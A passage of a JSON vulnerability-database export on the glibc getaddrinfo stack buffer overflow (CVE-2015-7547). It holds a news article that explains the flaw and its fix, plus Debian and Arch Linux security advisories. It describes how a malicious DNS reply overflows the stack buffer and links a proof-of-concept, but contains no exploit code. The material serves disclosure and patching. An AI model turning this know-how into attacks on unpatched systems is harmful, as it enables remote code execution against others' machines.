is in use, allowing hackers to remotely execute malicious code.\n\n \n\n\n### How Does the Flaw Work?\n\n \n\n\nThe flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.\n\n \n\n\nThis code then compromises the vulnerable application or device and tries to take over the control over the whole system.\n\n \n\n\nIt is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.\n\n \n\n\nHowever, an attacker need to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection _\u2013 in order to achieve successful RCE attack.\n\n \n\n\nAlternatively, an attacker on your network could perform **man-in-the-middle **(MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.\n\n \n\n\n### Affected Software and Devices\n\n \n\n\nAll versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\n \n\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\n \n\n\nThe vulnerability could extend to a nearly all the major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as the Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to lookup the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n \n\n\n### Who are Not Affected\n\n \n\n\nThe good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\n \n\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uclibc** library as it is more lightweight than hefty glibc.\n\n \n\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers July 2015.\n\n \n\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\n \n\n\nThe flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n \n\n\n### Where glibc went Wrong\n\n \n\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.\n\n \n\n\nHere's what went wrong, according to the Google engineers:\n\n \n\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\" \n \n\"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n \n\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle bod Fermin J. Serna released a [Proof-of-Concept](<https://github.com/fjserna/CVE-2015-7547>) (POC) exploit code on Tuesday.\n\n \n\n\nWith this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.\n\n \n\n\n### Patch glibc Vulnerability\n\n \n\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\n \n\n\nHowever, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.\n\n \n\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\n \n\n\nBut for other users, patching the problem may **not be so easy**. The apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time as users of affected apps have to wait for updates to become available from developers.\n\n \n\n\nMeanwhile, you can help prevent exploitation of the flaw, if you aren\u2019t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.\n\n \n\n\nFor more in-depth information on the glibc flaw, you can read Red Hat [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "modified": "2016-02-17T08:27:51", "published": "2016-02-16T21:27:00", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:28:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9761", "CVE-2015-7547"], "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u11\nCVE ID : CVE-2015-7547\n\nSeveral vulnerabilities have been fixed in the Debian GNU C Library,\neglibc:\n\nCVE-2015-7547\n The Google Security Team and Red Hat discovered that the glibc\n host name resolver function, getaddrinfo, when processing\n AF_UNSPEC queries (for dual A/AAAA lookups), could mismange its\n internal buffers, leading to a stack-based buffer overflow and\n arbitrary code execution. This vulnerability affects most\n applications which perform host name resolution using getaddrinfo,\n including system services.\n\nThe following fixed vulnerabilities currently lack CVE assignment:\n\n Andreas Schwab reported a memory leak (memory allocation without a\n matching deallocation) while processing certain DNS answers in\n getaddrinfo, related to the _nss_dns_gethostbyname4_r function.\n This vulnerability could lead to a denial of service.\n\nFor Debian 6 "Squeeze", these issues have been fixed in eglibc version\neglibc_2.11.3-4+deb6u11. In addition this version corrects the fix for\nCVE-2014-9761 in Squeeze, which have wrongly marked a few symbols as\npublic instead of private.\n\nWhile it is only necessary to ensure that all processes are not using\nthe old eglibc anymore, it is recommended to reboot the machines after\napplying the security upgrade.\n\nWe recommend you to upgrade your eglibc packages.\n", "edition": 9, "modified": "2016-02-16T16:49:39", "published": "2016-02-16T16:49:39", "id": "DEBIAN:DLA-416-1:26BFF", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201602/msg00009.html", "title": "[SECURITY] [DLA 416-1] eglibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T00:58:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8776", "CVE-2015-8779", "CVE-2015-8778", "CVE-2015-7547"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3481-1 security@debian.org\nhttps://www.debian.org/security/ Florian Weimer\nFebruary 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : glibc\nCVE ID : CVE-2015-7547 CVE-2015-8776 CVE-2015-8778 CVE-2015-8779\nDebian Bug : 812441 812445 812455\n\nSeveral vulnerabilities have been fixed in the GNU C Library, glibc. \n\nThe first vulnerability listed below is considered to have critical\nimpact.\n\nCVE-2015-7547\n\n The Google Security Team and Red Hat discovered that the glibc\n host name resolver function, getaddrinfo, when processing\n AF_UNSPEC queries (for dual A/AAAA lookups), could mismanage its\n internal buffers, leading to a stack-based buffer overflow and\n arbitrary code execution. This vulnerability affects most\n applications which perform host name resolution using getaddrinfo,\n including system services.\n\nCVE-2015-8776\n\n Adam Nielsen discovered that if an invalid separated time value\n is passed to strftime, the strftime function could crash or leak\n information. Applications normally pass only valid time\n information to strftime; no affected applications are known.\n\nCVE-2015-8778\n\n Szabolcs Nagy reported that the rarely-used hcreate and hcreate_r\n functions did not check the size argument properly, leading to a\n crash (denial of service) for certain arguments. No impacted\n applications are known at this time.\n\nCVE-2015-8779\n\n The catopen function contains several unbound stack allocations\n (stack overflows), causing it the crash the process (denial of\n service). No applications where this issue has a security impact\n are currently known.\n\nWhile it is only necessary to ensure that all processes are not using\nthe old glibc anymore, it is recommended to reboot the machines after\napplying the security upgrade.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.19-18+deb8u3.\n\nFor the unstable distribution (sid), these problems will be fixed in\nversion 2.21-8.\n\nWe recommend that you upgrade your glibc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2016-02-16T14:18:54", "published": "2016-02-16T14:18:54", "id": "DEBIAN:DSA-3481-1:79F3C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00051.html", "title": "[SECURITY] [DSA 3481-1] glibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8776", "CVE-2015-8777", "CVE-2015-8779", "CVE-2015-8778", "CVE-2015-7547"], "description": "- CVE-2015-7547 (arbitrary code execution)\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from\nthe nss_dns NSS service module.\n\n- CVE-2015-8776 (information disclosure)\n\nIt was found that out-of-range time values passed to the strftime\nfunction may cause it to crash, leading to a denial of service, or\npotentially disclosure information.\n\n- CVE-2015-8777 (restriction bypass)\n\nLD_POINTER_GUARD was an environment variable which controls\nsecurity-related behavior, but was not ignored for privileged binaries\n(in AT_SECURE mode). This might allow local attackers (who can supply\nthe environment variable) to bypass intended security restrictions.\n\n- CVE-2015-8778 (arbitrary code execution)\n\nAn integer overflow in hcreate and hcreate_r which can result in\nan out-of-bound memory access. This could lead to application crashes\nor, potentially, arbitrary code execution.\n\n- CVE-2015-8779 (arbitrary code execution)\n\nA stack overflow (unbounded alloca) in the catopen function can cause\napplications which pass long strings to the catopen function to crash\nor, potentially execute arbitrary code.", "modified": "2016-02-17T00:00:00", "published": "2016-02-17T00:00:00", "id": "ASA-201602-14", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-February/000554.html", "type": "archlinux", "title": "glibc: multiple issues", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}